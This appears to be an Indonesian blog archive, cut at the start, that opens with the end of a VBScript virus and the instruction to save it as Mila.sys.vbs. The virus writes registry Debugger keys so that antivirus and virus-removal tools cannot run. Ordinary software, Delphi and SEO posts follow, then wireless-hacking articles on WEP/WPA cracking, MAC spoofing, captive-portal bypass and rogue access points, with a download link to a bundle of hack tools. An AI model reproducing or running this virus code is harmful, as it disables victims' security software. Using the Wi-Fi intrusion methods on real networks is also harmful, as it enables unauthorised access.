F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“

if check 1 then

Wscript.sleep 200000

end if

loop while check 1

set sd = createobject(“Wscript.shell”)

sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

3. Simpan dengan nama Mila.sys.vbs

penulis: smile_netstar@yahoo.com

Mengganti Login Screen Pada Windows XP

2010-03-14T21:11:00.001-07:00

Ditulis pada tanggal March 13, 2010 Oleh Lutfi. Dibaca 684 kali.

View Comments

Login atau Logon screen merupakan tampilan yang muncul saat akan memasuki desktop. Secara default, tampilan login screen pada Windows XP berlatar belakang biru dengan tampilan daftar nama user di sisi kanan tengah.

Jika Anda merasa tampilan tersebut kurang menarik dan ingin mengganti dengan tampilan yang lain Anda dapat menggantinya secara mudah dengan menggunakan Windows XP LogonUI Changer.

Windows XP LogonUI Changer merupakan software yang dapat Anda gunakan untuk mengubah tampilan login screen pada Windows XP, cukup dengan beberapa kali klik.

Beberapa fitur yang cukup menarik dari Windows XP LogonUI Changer:

Dapat menampilkan preview dari login screen
Dapat menampilkan login screen secara acak (random)
Dapat mengganti wallpaper pada login screen

Secara default freeware ini tidak menyertakan pilihan login screen, jadi Anda perlu mendownload file yang akan dijadikan sebagai login screen baru dari berbagai situs di internet, salah satunya di sini.

Beberapa contoh alternatif login screen:

Jika Anda tertarik untuk mencoba Windows XP LogonUI Changer, Anda dapat mendownloadnya di http://www.softpedia.com/

sumber : www.klik-kanan.com

Facebook Chat dan Yahoo Chat Dengan Digsby

2010-03-14T21:09:00.000-07:00

View Comments

Anda yang sering menggunakan fasilitas chatting pada Facebook tentu merasakan betapa repotnya chatting lewat browser, terlebih jika pada saat yang bersamaan Anda melakukan chatting dengan beberapa orang sekaligus. Ditambah lagi jika Anda juga melakukan chatting dengan menggunakan yahoo messenger.

Nah, untuk mengurangi “kerepotan” tersebut Anda bisa menggunakan salah satu software facebook chat terbaik yaitu Digsby. Digsby merupakan aplikasi yang “menggabungkan” instant messaging (IM) dan social network (SN) seperti Facebook Chat, Yahoo Messenger, MSN, ICQ, dll ke dalam satu aplikasi. Dengan demikian Anda bisa melakukan chatting dengan teman Anda baik mereka menggunakan akun Facebook, Yahoo maupun ICQ.

Salah satu fitur yang cukup menarik dari software ini adalah fasilitas tab — seperti tab yang terdapat pada Firefox. Jadi ketika Anda chatting, tampilan chat tidak dalam bentuk jendela sendiri-sendiri tapi dalam bentuk tab.

Untuk menggunakan software ini Anda harus melakukan registrasi terlebih dahulu (registrasinya gratis). Setelah itu Anda download dan install Digsby pada komputer Anda. Langkah berikutnya adalah menambahkan akun pada Digsby, bisa akun Facebook, Yahoo, MSN, atau ICQ.

Setelah akun ditambahkan ke Digsby, maka ketika Anda login ke Digsby secara otomatis Anda juga login ke akun yang telah dimasukkan ke Digsby tersebut.

Jika Anda tertarik dengan software Digsby, Anda dapat mendownlodnya di http://www.digsby.com/

Gratis Windows Styler Untuk Mempercantik Windows Anda

2010-03-14T21:08:00.001-07:00

Ditulis pada tanggal March 4, 2010 Oleh Lutfi. Dibaca 3,260 kali.

View Comments

SystemUp 2009 Windows Styler merupakan software yang dapat Anda gunakan untuk mengubah dan mempercantik tampilan Windows XP dan Windows Vista Anda. Secara fungsi software ini mirip seperti WindowBlinds, Talisman, atau TrueTransparency yang pernah kami bahas.

Dalam rangka promosi, zoneLink memberikan gratis software Windows Styler (harga aslinya 9.99 €).

Untuk mendapatkan SystemUp 2009 Windows Styler secara gratis, caranya sebagai berikut:

Buka halaman promosi ini.
Tulis alamat email Anda dan klik tombol Lizenzschlüssel anfordern.
Buka email Anda dan catat kode registrasi yang telah dikirimkan dari noreply@zonelink.de.
Download softwarenya di sini.
Install software dan masukkan kode registrasi yang telah Anda terima.
Selesai

Setelah itu Anda bisa mencoba mengganti tampilan Windows Anda dari
Windows Styler tersebut. Secara default ada 3 theme bawaan Windows Styler. Anda bisa mendapatkan secara gratis theme tambahan untuk Windows Styler di sini.

Sumber :http://www.klik-kanan.com/

10 Tips Tetap Aman di Facebook

2010-03-11T20:04:00.000-08:00

Pengguna Facebook adalah mangsa mudah bagi pelaku kriminal seiring dengan banyaknya orang berbagi informasi. Perusahaan antivirus menyediakan 10 tips menyangkut hal itu.

Pelaku kriminal telah memanen dan menjual informasi milik pengguna Facebook, mencuri identitas, mengirim spam dan virus berbahaya.

“Setiap hari orang menempatkan diri mereka dalam risiko dengan mengklik secara tidak hati-hati terhadap undangan yang dikirim oleh teman untuk bergabung dalam grup atau menulis dalam dinding mereka,” ujar Manajer Pemasaran AVG Lloyd Borret.

“Mereka menaruh semua informasi personal termasuk tanggal lahir dan foto di dalam halaman mereka. Mereka bahkan merespon permintaan Facebook palsu,” tambah Borret.

Untuk membantu agar pengguna tetap aman di Facebook, AVG memberikan 10 tips :

1. Pikirkan apa yang akan ditambahkan; menerima permintaan yang disediakan oleh teman baru dengan akses posting, foto, pesan dan informasi latar belakang tentang pribadi Anda. Perhatikan daftar teman dan pikirkan kembali siapa yang berhak mengakses barang pribadi anda.

2. Cek pengaturan privasi. Facebook baru-baru ini melakukan pembaruan, mengatur privasi dari awal bisa sangat berarti.

3. Alasan berada di Facebook. Apakah berbagi foto? Tetap berhubungan dengan orang lain? Berbagi link dan pembaruan aktivitas? Tanyakan diri sendiri apa yang ingin diperoleh dengan profil pribadi. Dengan demikian akan lebih memangkas informasi pribadi yang ada di publik.

4. Cerdas tentang password. coba untuk tidak menggunakan password yang sama untuk seluruh akun. Pikirkan tipe pertanyaan keamanan yang dipasang dan di mana akan mengirim pembaruan tersebut.

5. Waspada penggunaan komputer. Ketika masuk ke dalam suatu akun dari komputer yang berbeda-beda, periksa bahwa komputer tersebut tidak menyimpan alamat email ataupun password.

6. Hati-hati dengan yang dikatakan. Sekali pembaruan status dan komentar diposting, setiap orang dapat melihat, menduplikasi dan memposting kembali di mana pun dan kapan pun. Apakah Anda ingin orang lain tahu bahwa Anda akan di rumah sendirian malam ini atau pergi liburan pekan depan?.

7. Perhatikan serangan phising. Banyak usaha yang dilakukan untuk memperoleh log-in pengguna dan password dengan cara menipu pengguna dengan email Facebook palsu. Jangan pernah mengidahkan link email yang meminta untuk me-reset password. Kalau perlu untuk me-reset langsung saja ke halaman Facebook.

8. Ambil langkah segera. Jika teman-teman mulai menerima spam atau pembaruan status yang muncul tetapi tidak dibuat oleh pengguna sendiri maka akun tersebut kemungkinan tersusupi. Segera lakukan perubahan password. Jika tidak bisa masuk ke akun pribadi, segera pergi ke link Help di bagian bawah Facebook dan klik Security untuk memberitahu Facebook.

9. Lindungi perangkat mobile. Banyak ponsel yang memiliki akses langsung ke situs jejaring sosial, termasuk Facebook. Waspada terhadap siapapun yang mengakses ponsel dan pastikan akun yang dimiliki sudah log-out.

10. Monitor aktivitas mencurigakan. Awasi aktivitas mencurigakan di dinding Anda, jejak berita dan kotak masuk Facebook. Jangan pernah mengklik link mencurigakan. Lihat lebih dekat, jika link yang dimaksud tidak otentik, jangan pernah mengkliknya.

Sumber:http://www.artikeltentangkomputer.co.cc

Susahnya Mengingat Username dan Password?

2010-03-11T20:00:00.001-08:00

Susahnya Mengingat Username dan Password, Mungkin anda bingung dengan judul artikel tersebut. Okee langsung saja, Apablia anda mempunyai banyak account di internet anda banyak mengikuti program yang ada di internet, Apalagi anda yang sering dapat duit dari internet, pasti anda tidak mau kan kalau akan kehilangan $$$ anda karena harus mengingat username dan password di account anda yang anda ikuti satu per satu, Seperti Program Penghasil Uang di Internet :

PPC (Pay Per Click)
PTC (Paid To Click)
Paid Review
Affiliate Marketing
Domain Parking
Direct Ads, dll

Apalagi anda mempunyai email banyak/ lebih dari satu dan Susahnya Mengingat Username dan Password anda yang begitu banyaknya di internet. disini lah solusinya untuk mempelancar kerja dan karena keterbatasan ingatan kita, karena dengan software ini kita dapat minyimpan semua username dan password di database program yang nama nya S10 Password Vault, karena data yang disimpan akan di encrypted namun penggunaannya sangat mudah. langsung saja mak nyus.....

S10 Password Vault merupakan password manager yang dapat Anda gunakan untuk menyimpan informasi username dan password dengan aman. Dengan menggunakan software gratis ini Anda tidak perlu lagi mengingat semua username dan password untuk banyak akun web yang Anda miliki, misalnya akun email yahoo, gmail, facebook, friendster, blog, dan sebagainya.

Program ini freeware dan cukup simpel, setidaknya jika dibandingkan dengan BloggerTool yang tidak dapat di gunakan secara otomatis secara online dan ada lagi jika di bandingkan dengan AiRoboForm.exe = meskipun featurenya sangat friendly, tapi saya pribadi lebih senang menggunakan s10 dari pada AiRoboForm.exe, karena AiRoboForm.exe berjalan pada browser firefox(Add Ons).

Sebelum menggunakan S10 Password Vault ini pertama-tama Anda harus membuat master password terlebih dahulu.

Secara default akun pada S10 Password Vault terdiri dari beberapa kategori, yaitu Banking, Email, Shopping, Travel, Websites, dan Work. Untuk menambah kategori baru, Anda bisa melakukannya dengan mengklik kanan dan pilih menu New Folder.

Untuk membuat akun baru, pertama pilih kategori akun. Setelah itu klik kanan dan pilih menu New Account.

Salah satu fitur yang cukup menarik dari S10 Password Vault adalah Auto-type commands. Dengan fitur tersebut S10 Password Vault akan menuliskan username dan password secara otomatis pada situs yang sedang Anda kunjungi. Untuk mengaktifkan Auto-type commands Anda bisa menekan tombol Ctrl + Alt + L.

Udah dulu tutorialnya,sampai sini udah bisa pahamkan cara membuatnya,jika tidak bisa online,Sobat juga bisa membuatnya secara online,silahkan download sofwarenya pada tombol dibawah ini.

Download : S10PasswordVault

Dan kalau pengen mencoba selain pada yang telah saya bahasa pada artikel ini, silahkan download sofwarenya pada tombol dibawah ini.

Download : BloggerTool.rar
Download : AiRoboForm.exe

Dan kalau pengen tau cara instalasinya Software yang kita bahas pada artikel ini, silahkan download langkah-langkah instalasinya pada tombol dibawah ini.

Download : Panduan Instlasi

Cara Install Quick Report versi 4.0 di Delphi 7

2010-03-11T19:57:00.000-08:00

Sebelum meng-install pastikan Quick Report versi sebelumnya sudah hilang dari delphi. Caranya, pilih menu Components-Install Packages, pilih item yang berhubungan dengan quick report (ada dua item, Quick Report Components dan TreeChart for Quick Report) lalu tekan tombol Remove.

Jangan lupa untuk menghapus file quickreprot *.bpl yang ada di windows/system(32), termasuk yang ada di folder Program Files/Borland/Delphi7/Projects/bpl.

Install file setup-nya, otomatis di folder Program Files/Borland/Delphi7 akan muncul folder dengan nama quickrpt, jalankan file package yang ada di folder tersebut.

Menampilkan CheckBox di DBGrid

2010-03-11T19:51:00.000-08:00

type
TForm1 = class(TForm)
DBGrid1: TDBGrid;
procedure DBGrid1DrawColumnCell(Sender: TObject; const Rect: TRect;
DataCol: Integer; Column: TColumn; State: TGridDrawState);
procedure DBGrid1CellClick(Column: TColumn);
procedure DBGrid1ColEnter(Sender: TObject);
procedure DBGrid1ColExit(Sender: TObject);
procedure SaveBoolean;
private
{ Private declarations }
FOriginalOptions : TDBGridOptions;
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}

procedure TForm1.SaveBoolean;
begin
DBGrid1.SelectedField.Dataset.Edit;
DBGrid1.SelectedField.AsBoolean := not Self.DBGrid1.SelectedField.AsBoolean;
end;

procedure TForm1.DBGrid1DrawColumnCell(Sender: TObject; const Rect: TRect;
DataCol: Integer; Column: TColumn; State: TGridDrawState);
Const
CtrlState : array[Boolean] of Integer = (DFCS_BUTTONCHECK,
DFCS_BUTTONCHECK or DFCS_CHECKED);
var
CheckBoxRectangle : TRect;
begin
if Column.Field.DataType = ftBoolean then
begin
DBGrid1.Canvas.FillRect(Rect);
CheckBoxRectangle.Left := Rect.Left + 2;
CheckBoxRectangle.Right := Rect.Right – 2;
CheckBoxRectangle.Top := Rect.Top + 2;
CheckBoxRectangle.Bottom := Rect.Bottom – 2;
DrawFrameControl(DBGrid1.Canvas.Handle,
CheckBoxRectangle,
DFC_BUTTON,
CtrlState[Column.Field.AsBoolean]);
end;
end;

procedure TForm1.DBGrid1ColEnter(Sender: TObject);
begin
if DBGrid1.SelectedField.DataType = ftBoolean then
begin
Self.FOriginalOptions := DBGrid1.Options;
DBGrid1.Options := DBGrid1.Options – [dgEditing];
end;
end;

procedure TForm1.DBGrid1ColExit(Sender: TObject);
begin
if DBGrid1.SelectedField.DataType = ftBoolean then
DBGrid1.Options := Self.FOriginalOptions;
end;

procedure TForm1.DBGrid1CellClick(Column: TColumn);
begin
if DBGrid1.SelectedField.DataType = ftBoolean then
SaveBoolean();
end;

Jika artikel ini berguna, kamu bisa me-link ke postingan ini/berlangganan dengan blog kami/ menyebutkan kami di postingan Anda/mem-bookmark blog ini. Terima kasih atas dukungan Anda!

Cara Meningkatkan Peringkat Google dengan Mudah

2010-02-01T01:22:00.001-08:00

Cara Meningkatkan Peringkat Google dengan Mudah - Memiliki Peringkat paling atas dalam search engine google adalah hal yang istimewa,atau luar biasa bagi siapa saja yang mempunya website atau blog.Pertanyaannya adalah, bagaimana Anda mendapatkan peringkat yang lebih tinggi untuk postingan blog saya menggunakan Blogger?

Ada dua komponen utama : "off-page" dan on-page" optimization.Ada dua komponen utama "off-page" dan pada halaman optimasi ."off-page" Seo mengacu pada link taktik seperti bangunan.Semakin bayak website yang titik link mereka ke blog atau situs web, semakin baik.Ini adalah cara demokratis google menunjukan bahwa situs anda harus menjadi penting jika bayak orang yang menunjukan kepadanya.Lebih penting dengan "off-page" inbound adalah link yang sebenarnya teks (anchor text) yang digunakan untuk menunjukan ke situs anda.

Buktinya :

Dan Blogger template secara default tidak datang dengan dioptimalkan mesin pencari (SEO) tag judul yang berarti Anda tidak memaksimalkan blog Anda ke peringkat lebih baik di Google.Jika anda melihat pada judul Blogger Anda yang sudah ada, Anda akan melihat bahwa blogger menampilkan nama blog pertama yang kemudian diikuti dengan judul posting Anda.Mereka telah secara terbalik jadi mari kita mendapatkan blog Anda setup dengan benar.Dan Kita harus cepat-cepat untuk mengedit template Blogger Anda yang mungkin mengintimidasi sebagian dari Anda tapi itu sangat kecil dan tidak sakit sekali.Yang saya minta Anda untuk lakukan pertama adalah untuk cadangan template Anda hanya jika Anda membuat boo boo.Yang membuatnya mudah untuk memulihkan kembali tanpa banyak sakit kepala. hehehe...

Cara Sebagai berikut ini :

Pertama : Masuk ke account blogger anda sendiri sehingga masuk ke Dasbor, Kemudian Tata Letak, Edit HTML.

Kedua : Cari kode ini :<data:blog.pagetitle/> .
Biasanya code berada dibaris ke 5-10 pertama dari kode template anda.

Ketiga : kemudian ganti kodenya dengan ini :

<data:blog.title/>

<data:blog.pagename/> | <data:blog.title/>

Keempat: Simpan template

kemudian coba Klik ke dalam setiap individu pos dan melihat judul halaman.Semua posting blogger sekarang jauh lebih baik dioptimalkan untuk peringkat lebih tinggi di Google.Aku tidak akan menjanjikan Anda sebuah perbedaan siang dan malam tapi kau telah mengambil langkah dalam arahan yang benar.Sekarang pergi post unik konten berkualitas tinggi sehingga orang-orang yang mencari Google akan menemukan blog Anda terlebih dahulu!.

sumber :http://banditz-community.blogspot.com/2009/09/cara-meningkatkan-peringkat-google.html

WIRELESS HACKING

2010-01-27T19:45:00.000-08:00

Jaringan Wifi memiliki lebih banyak kelemahan dibanding dengan jaringan kabel. Saat ini
perkembangan teknologi wifi sangat signifikan sejalan dengan kebutuhan sistem informasi yang
mobile. Banyak penyedia jasa wireless seperti hotspot komersil, ISP, Warnet, kampus-kampus
maupun perkantoran sudah mulai memanfaatkan wifi pada jaringan masing masing, tetapi sangat
sedikit yang memperhatikan keamanan komunikasi data pada jaringan wireless tersebut. Hal ini
membuat para hacker menjadi tertarik untuk mengexplore keamampuannya untuk melakukan
berbagai aktifitas yang biasanya ilegal menggunakan wifi.
Pada artikel ini akan dibahas berbagai jenis aktivitas dan metode yang dilakukan para hacker
wireless ataupun para pemula dalam melakukan wardriving. Wardriving adalah kegiatan atau
aktivitas untuk mendapatkan informasi tentang suatu jaringan wifi dan mendapatkan akses terhadap
jaringan wireless tersebut. Umumnya bertujuan untuk mendapatkan koneksi internet, tetapi banyak
juga yang melakukan untuk maksud-maksud tertentu mulai dari rasa keingintahuan, coba coba,
research, tugas praktikum, kejahatan dan lain lain.
Kelemahan Wireless
Kelemahan jaringan wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada
konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Salah satu contoh penyebab
kelemahan pada konfigurasi karena saat ini untuk membangun sebuah jaringan wireless cukup
mudah. Banyak vendor yang menyediakan fasilitas yang memudahkan pengguna atau admin
jaringan sehingga sering ditemukan wireless yang masih menggunakan konfigurasi wireless default
bawaan vendor. Penulis sering menemukan wireless yang dipasang pada jaringan masih
menggunakan setting default bawaan vendor seperti SSID, IP Address , remote manajemen, DHCP
enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut.
WEP (Wired Equivalent Privacy) yang menjadi standart keamanan wireless sebelumnya, saat ini
dapat dengan mudah dipecahkan dengan berbagai tools yang tersedia gratis di internet. WPA-PSK
dan LEAP yang dianggap menjadi solusi menggantikan WEP, saat ini juga sudah dapat dipecahkan
dengan metode dictionary attack secara offline.

Beberapa kegiatan dan aktifitas yang dilakukan untuk mengamanan jaringan wireless antara lain:
1. Menyembunyikan SSID
Banyak administrator menyembunyikan Services Set Id (SSID) jaringan wireless mereka dengan
maksud agar hanya yang mengetahui SSID yang dapat terhubung ke jaringan mereka. Hal ini
tidaklah benar, karena SSID sebenarnya tidak dapat disembuyikan secara sempurna. Pada saat saat
tertentu atau khususnya saat client akan terhubung (assosiate) atau ketika akan memutuskan diri
(deauthentication) dari sebuah jaringan wireless, maka client akan tetap mengirimkan SSID dalam
bentuk plain text (meskipun menggunakan enkripsi), sehingga jika kita bermaksud menyadapnya,
dapat dengan mudah menemukan informasi tersebut. Beberapa tools yang dapat digunakan untuk
mendapatkan ssid yang dihidden antara lain, kismet (kisMAC), ssid_jack (airjack), aircrack ,
void11 dan masih banyak lagi.
2. Keamanan wireless hanya dengan kunci WEP
WEP merupakan standart keamanan & enkripsi pertama yang digunakan pada wireless, WEP
memiliki berbagai kelemahan antara lain :
 Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
 WEP menggunakan kunci yang bersifat statis
 Masalah initialization vector (IV) WEP
 Masalah integritas pesan Cyclic Redundancy Check (CRC-32)
WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada
kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga
pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.
Serangan-serangan pada kelemahan WEP antara lain :
- Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS
singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir.
Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyak-banyaknya.
Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan
( www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf )
- Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses
cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali
ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi
kebutuhan IV yang lemah dalam melakukan cracking WEP.
- Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat
waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering
dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali
ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat.
Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan
spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari

chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching
terhadap driver dan aplikasinya.

3. Keamanan wireless hanya dengan kunci WPA-PSK atau WPA2-PSK
WPA merupakan teknologi keamanan sementara yang diciptakan untuk menggantikan kunci
WEP. Ada dua jenis yakni WPA personal (WPA-PSK), dan WPA-RADIUS.
Saat ini yang sudah dapat di crack adalah WPA-PSK, yakni dengan metode brute force
attack secara offline. Brute force dengan menggunakan mencoba-coba banyak kata dari suatu
kamus. Serangan ini akan berhasil jika passphrase yang yang digunakan wireless tersebut
memang terapat pada kamus kata yang digunakan si hacker.
Untuk mencegah adanya serangan terhadap keamanan wireless menggunakan WPA-PSK,
gunakanlah passphrase yang cukup panjang (satu kalimat).
Tools yang sangat terkenal digunakan melakukan serangan ini adalah CoWPAtty (
http://www.churchofwifi.org/ ) dan aircrack ( http://www.aircrack-ng.org ) . Tools ini
memerlukan daftar kata atau wordlist, dapat di ambil dari http://wordlist.sourceforge.net/
4. MAC Filtering
Hampir setiap wireless access point maupun router difasilitasi dengan keamanan MAC
Filtering. Hal ini sebenarnya tidak banyak membantu dalam mengamankan komunikasi
wireless, karena MAC address sangat mudah dispoofing atau bahkan dirubah.
Tools ifconfig pada OS Linux/Unix atau beragam tools spt network utilitis, regedit, smac,
machange pada OS windows dengan mudah digunakan untuk spoofing atau mengganti
MAC address.
Penulis masih sering menemukan wifi di perkantoran dan bahkan ISP (yang biasanya
digunakan oleh warnet-warnet) yang hanya menggunakan proteksi MAC Filtering. Dengan
menggunakan aplikasi wardriving seperti kismet/kisMAC atau aircrack tools, dapat
diperoleh informasi MAC address tiap client yang sedang terhubung ke sebuah Access Point.
Setelah mendapatkan informasi tersebut, kita dapat terhubung ke Access point dengan
mengubah MAC sesuai dengan client tadi. Pada jaringan wireless, duplikasi MAC adress
tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.
5. Captive Portal
Infrastruktur Captive Portal awalnya didesign untuk keperluan komunitas yang
memungkinkan semua orang dapat terhubung (open network). Captive portal sebenarnya
merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik
hingga user melakukan registrasi/otentikasi. Berikut cara kerja captive portal :
1. user dengan wireless client diizinkan untuk terhubung wireless untuk mendapatkan IP
address (DHCP)
2. block semua trafik kecuali yang menuju ke captive portal (Registrasi/Otentikasi berbasis
web) yang terletak pada jaringan kabel.
3. redirect atau belokkan semua trafik web ke captive portal
4. setelah user melakukan registrasi atau login, izinkan akses ke jaringan (internet)

Beberapa hal yang perlu diperhatikan, bahwa captive portal hanya melakukan tracking koneksi
client berdasarkan IP dan MAC address setelah melakukan otentikasi. Hal ini membuat captive
portal masih dimungkinkan digunakan tanpa otentikasi karena IP dan MAC adress dapat dispoofing.
Serangan dengan melakukan spoofing IP dan MAC. Spoofing MAC adress seperti yang sudah
dijelaskan pada bagian 4 diatas. Sedang untuk spoofing IP, diperlukan usaha yang lebih yakni
dengan memanfaatkan ARP cache poisoning, kita dapat melakukan redirect trafik dari client yang
sudah terhubung sebelumnya.
Serangan lain yang cukup mudah dilakukan adalah menggunakan Rogue AP, yaitu mensetup Access
Point (biasanya menggunakan HostAP) yang menggunakan komponen informasi yang sama seperti
AP target seperti SSID, BSSID hingga kanal frekwensi yang digunakan. Sehingga ketika ada client
yang akan terhubung ke AP buatan kita, dapat kita membelokkan trafik ke AP sebenarnya.
Tidak jarang captive portal yang dibangun pada suatu hotspot memiliki kelemahan pada konfigurasi
atau design jaringannya. Misalnya, otentikasi masih menggunakan plain text (http), managemen
jaringan dapat diakses melalui wireless (berada pada satu network), dan masih banyak lagi.
Kelemahan lain dari captive portal adalah bahwa komunikasi data atau trafik ketika sudah
melakukan otentikasi (terhubung jaringan) akan dikirimkan masih belum terenkripsi, sehingga
dengan mudah dapat disadap oleh para hacker. Untuk itu perlu berhati-hati melakukan koneksi pada
jaringan hotspot, agar mengusahakan menggunakan komunikasi protokol yang aman seperti
https,pop3s, ssh, imaps dst.
Seminar

WIRELESS HACKING TOOL

2010-01-27T19:34:00.000-08:00

NetStumbler

Netstumbler yang dikenal sebagai Jaringan Stumbleris suatu alat acilitates detecting dari Wireless Lans menggunakan Wireless 802.11b, 802.11a dan 802.11g WLAN standar yang berjalan pada sistem operasi dari microsoft Win98 – Win Vista, ada versi lain juga yang disebut Anothere Mini Stumbler yang menggunakan sistem operasi Windows CE. Untuk alat” kecil yang bisa di genggam.
Anda bisa mendapatkannya disini

Aircrack
Tercepat untuk WEP / WPA cracking tool
Aircrack adalah suite alat untuk 802.11a/b/g WEP dan WPA cracking. Hal ini dapat dilakukan dalam 40 sampai 512-bit password WEP dan hanya sekali dienkripsi paket” telah dikumpulkan. Aircrack juga dapat menyerang WPA 1 atau 2 jaringan dengan menggunakan metode lanjutan cryptographic kasar atau memaksa. Suite yang mencakup airodump (802,11 sebuah paket pengambil program), aireplay (802,11 sebuah paket suntikan program), aircrack (statis WEP dan WPA-PSK cracking), dan airdecap (decrypts WEP / WPA untuk pengambil file).
Anda dapat memperoleh Aircrack disini

Airsnort
802,11 WEP Encryption Cracking Tool
AirSnort adalah LAN nirkabel (WLAN) tool yang digunakan untuk merecover enkripsi password. Ia dikembangkan oleh shmoo kelompok pasif dan dioperasikan oleh pemantauan transmisi, komputasi enkripsi password akan dilakukan bila paket telah dikumpulkan. Anda mungkin juga akan tertarik dengan Airsnort ini.
Anda dapat memperoleh AirSnort disini

Cowpatty
Cowpatty ini adalah tools yang baik untuk memaksa cracking WPA-PSK, yang dianggap “WEP Baru” untuk Home Wireless Security. Program ini hanya mencoba a bunch dari berbagai pilihan dari kamus file untuk melihat dan menemukan apa yang didefinisikan sebagai Pre-Shared Key.
Anda dapat memperoleh Cowpatty disini

Asleap
Alat ini sangat bagus ketika menggunakan jaringan Leap. Alat ini dapat digunakan untuk mengumpulkan data otentikasi yang sedang lewat di jaringan, dan ini dapat di sniffed sehingga bisa di crack. Leap tidak melindungi otentikasi lainnya seperti “real” EAP, yang merupakan alasan utama mengapa Leap dapat mudah rusak.
Anda dapat memperoleh Leap disini

Ethereal
Ethereal digunakan oleh seluruh dunia Wind0s oleh kedua sistem operasi dan opensource, yang digunakan untuk mengatasi masalah, analisis, dan perangkat lunak protokol pembangunan, dan pendidikan. Memiliki semua fitur-fitur standar yang akan diharapkan dalam analisa protokol, dan beberapa fitur tidak dilihat pada setiap produk. Lisensi open source memungkinkan penambahan perangkat tambahan bagi anda” yang memiliki keahlian. Bagus loh.. Coba deh
Anda dapat men-download Ethereal disini

Yang lainnya:

AiO Wireless Hack Tools 2009:

• NetStumbler 0.4.0
• Kismet 2005 08 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• Airsnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4

Information File:

Name: AIO Wireless Hack Tools 2009 Full
Size: 8,1 MB (recovery register 1%)
Language: English
Support Platform: Linux, Windows.
Format: RAR
Downloadfile :

DL Link:

http://rapidshare.com/files/151930205/AIO_WHT2009_-_ErFeX__AiO.ProgramasFull.CoM.rar/

WIRELESS HACKING TUTORIAL

WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WEP karena keamanan yang lemah, repot, atau WEP sangat pointless, karena bisa dicrack, walaupun biasanya memakan waktu cukup lama untuk memperoleh cukup data untuk mendapatkan password WEP, terutama password yang sangat panjang.

WEP terdiri dari password rahasia dan enkripsi. Password rahasia yang digunakan bersama antara akses point dan semua orang di jaringan nirkabel, terdiri dari 5 atau 13 karakter. Digunakan oleh proses enkripsi untuk komunikasi paket yang disamarkan sepanjang WLAN, atau Wireless Local Area Network. Semua paket yang unik dan acak, jadi jika seseorang melakukan crack pada satu paket key, mereka tidak dapat melihat apa yang dilakukan orang lain tanpa melakukan cracking pada mereka juga.

Ini semua dilakukan dengan menggunakan password rahasia bersamaan dengan tiga karakter (the Initialization Vector, atau IV) yang dipilih secara acak oleh perangkat nirkabel. Misalnya, jika Anda adalah password “hello”, mungkin membuat “abchello” untuk satu paket, dan “xyzhello” untuk lainnya.

WEP juga menggunakan XOR, atau Eksklusif ATAU, untuk enkripsi. XOR membandingkan dua bit, dan jika theyre berbeda, ia akan mengembalikan 1. Jika tidak, ia akan mengembalikan 0. Misalnya, 1 XOR 1 akan 0, dan 1 XOR 0 akan 1.

Array adalah variabel yang dapat menyimpan beberapa nilai. Misalnya, array abjad [26] akan terus nilai 26, yang diberi label 0 melalui 25.

Contoh:

alphabet[0] = ‘A’;
alphabet[1] = ‘B’;

void swap(char &first, char &second)
{
char temp = first;
first = second;
second = temp;
}

swap(alphabet[0], alphabet[1]);

Jika nilai-nilai array swapped randomely telah berkali-kali, maka tidak mungkin dikirim ke array elemen yang memegang nilai.

